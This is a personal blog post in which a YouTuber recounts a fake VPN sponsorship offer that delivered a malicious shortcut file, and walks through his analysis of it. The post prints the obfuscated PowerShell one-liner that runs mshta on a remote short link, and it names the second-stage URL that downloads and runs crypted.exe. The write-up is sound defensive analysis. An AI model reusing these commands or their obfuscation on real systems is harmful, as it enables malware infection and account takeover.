Updated: Feb 15, 2020
This is going to be a long post, so buckle up for an interesting story where I was targeted by someone and got almost hacked by social engineering.
So, on Feb 9, 2020 I got an email from a company named FruityVPN regarding a sponsorship proposal. They were offering to sponsor my videos on YouTube.
The deal was pretty good, and since I get sponsorship proposals like these very often (mostly from VPN companies), I replied. Also, note that I've had many successful sponsorships from companies like Dashlane, Skillshare, etc. So there's nothing stopping me from negotiating with this company about the type of sponsorship and other details.
They were offering 700$ for a 15-20 seconds feature in a single video. In addition, they were also providing me with a affiliate link using which I can earn 15% commission. Well, a sponsorship like this is what any YouTuber needs, right?
I was travelling when I got this mail, and I didn't have my laptop to do a proper research on this company, I did visit their website and it looked legit. So I simply said OK for the deal considering the fact that I had a good experience with sponsorships from VPN companies.
Once I said I'm in, I received a reply almost immediately that says I need to first provide them with the promotional clip before receiving the payment.
I felt a little weird looking at this reply. Usually any company approaching for sponsorship would not use a statement like "Before making the payment, you must do this..." I mean I didn't ask for the payment yet, did I? It kind of felt like they were trying to lure me.
But anyways, I ignored and proceeded to say that I need an advance payment of 15% so that I can start working on the integration of their ad to my video. This is the general strategy I follow for every sponsorship to stay on the safer side, and make sure that the sponsors are serious about the sponsorship. But then, I got another weird response.
First off, this is very embarrassing for any creator. Advance payment is a necessity for the mutual benefit of both the ends. But anyways, I proceeded by asking them what they meant by the "clip". Then, I understood that they first want to see a 15-20 seconds ad clip about their product which I will later integrate to my video (and not the whole video with the ad integrated). Making a 15-20 seconds video is not a big deal and will hardly take an hour, so the next day I prepared to make the clip and submit it to them.
I was reading the second mail they sent me, and I noticed that they were offering the product related content (usually logos of the product, short clips, product info, features, offers, instructions etc) that can be included in the promotional clip.
All brands do provide such brand related content. So, I didn't get suspicious at all.
I clicked on the google drive link they sent me, and downloaded the file. It's a zip file. I tried unzipping it and got an error.
I replied them that I'm getting an error, I didn't get a response. In the first mail they sent me, they mentioned to contact on twitter for faster replies, so I went to Twitter and messaged them.
The response seems pretty convincing, maybe they just mistakenly provided a wrong file?
Anyway, I download the file from the new link they provided, and tried unzipping, but got the same error again. WTF! These guys don't even know how to share a file and they are running a VPN company?
I sent them the screenshot.
I used 7zip and still couldn't unzip it.
At this point I was frustrated, and actually looked more closely at the file.
The first thing that surprised me is the file size. Its less than a KB!
Then, I looked at the name. It's FruityVPN.txt.lnk.zip
So, after unzipping, it will be FruityVPN.txt.lnk, and this is a LNK file!
An LNK file is nothing but a shortcut file that you create on Windows. It is just linking to an original file, and when you open this file, it just opens the original file that is linked with it.
My first thoughts after realizing that it is a shortcut file are, maybe the marketing team are technically illiterate and thus they are trying to share the shortcut file instead of sharing the original file?
So, I messaged them the same.
And now they're concerned if I'm doing this on Windows or Mac? WTF?
This is when I got suspicious.
They further insisted that even though it shows an error while unzipping with 7zip, the unzipped archive must be saved somewhere on the computer. Yes, it is indeed saved!
But then, the file is not of recognized type?
I chopped down the file name to FruityVPN.txt.lnk and now it is recognized as a shortcut!
I obviously don't want to open it blindly, so I went to the file properties.
For a shortcut file, it shows the target file that is linked with the shortcut file in the "Target" section.
For this shortcut file, the target seemed very weird, or should I say suspicious?
With an LNK analyzer tool, I analyzed it and here is what I found.
Look at the Relative Path, it is opening powershell and executing some code that is mentioned in the Arguments section.
$vqc=[string][char]@(0x68,0x74,0x74,0x70,0x73) -replace ' ','';$gui=[string][char]@(0x6d,0x73,0x68,0x74,0x61) -replace ' ','';sal vn $gui;$vqc+='://bit.do/fsykX';vn $vqc
After analyzing this powershell script, I found that it is basically downloading a file from https://bit.do/fsykX and running the downloaded file as soon as it is downloaded.
I manually went to this link from my browser and it downloaded a .hta file
While downloading on browser, it shows a warning that the file may harm your computer, but if you download it from powershell, no warnings are shown and the file is downloaded without any interruption.
This is a HTML application (.hta file)
It functions similar to a .exe file. When you double click a .hta file, it runs immediately just like how a .exe file would.
Instead of double clicking the file, I opened it with a text editor, and since its a HTML application, I was able to read the code.
The code looked like this.
If you want to read the code for yourself, I saved it here.
The HTML application has vbscript in it.
The code looked very funny and gibberish. There was no way one could figure out what it does as soon as they looked at it. The reason is, all the variables are random strings which made no sense, including function names. And it included lot of additional unnecessary code in-order to make it less readable.
For example, instead of directly storing the value for a variable as zrcrkxn = 2
They are doing zrcrkxn = 1 * 3 - 1
Obviously, because it's a malware. If you're the one who wrote this malware, you wouldn't want someone to read and figure out what your code does, right? You would want to make it the least readable.
After taking some time, I figured out what the code does.
I reformed the gibberish vbscript into something that makes more sense. I skipped some part of the code, because I don't want certain things to be executed (which would do malicious tasks on my computer, which is the whole point of the malware). I just wanted to see what each Function does. You can the reformed code here.
I executed this on my command prompt by doing cscript reformedcode.vbs
Another powershell script?
The next two lines of the original code (which I skipped in my reformed code) were :
set xgjtof = CreateObject("Wscript.Shell")
khezxtlctf is basically the powershell script that is highlighted with the red box in the above screenshot.
xgjtof.Run(khezxtlctf),0,true will run this text with Wscript.exe
This is going to run the the powershell script in windows powershell.
Again, looking at this powershell script makes me angry, because look at the those variable names and those unnecessary operations. The goal is to not be readable, of-course You can read the powershell script here.
Once again, I took some to analyze it, and understood what it does.
I took each line of the powershell script (separated by semi-colon) and executed it on my powershell window carefully skipping the risky lines.
Here are the important variables and their corresponding values I found :
$jfwlpghdovb = "iyf" (This is randomly generated 3 lowercase letters, it can be any other combination of 3 letters)
$hdxnlosbpmk = ".exe" (This is a constant)
$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk (which makes "iyf.exe")
$kjavpydntew = "Net.WebClient" (A pre-defined class in powershell)
$bykmo = "C:\Users\Public\iyf.exe" (To create the file in this path)
$zvngemsbua = http://220.127.116.11/brft/crypted.exe (This is the most interesting one, this is the address from where the actual malware is downloaded)
Finally, it is downloading the file from $zvngemsbua and writing it to $bykmo.
Since it's powershell, no interruptions were encountered even though the file being downloaded is a malware. The file downloads successfully into the defined destination.
And then it starts the process at $bykmo. Which means, it runs the iyf.exe (which is the actual malware in .exe format)
Oh boy! So this is what's happening. They want to hack my computer and probably steal my YouTube channel (with 400k subs). I'm pretty sure the malware at iyf.exe will give them a shell on my computer, or it may even be a ransomware. Not sure, as I didn't reverse-engineer the .exe malware yet. But it was obviously a malware.
Meanwhile the twitter conversation went on. Even after knowing that they are trying to hack me, I acted like I didn't know what's going on.
I finally revealed that I knew what they were trying to do.
And this is the response I got after exposing them.
LOL, what an immature childish response!
PS : Keeping everything aside, I really think this is a pretty well executed social engineering attack. If this was done to some other non-technical creator, they would've probably fallen for it. Initially, I fell for this but thank god, I realized before things got out of control.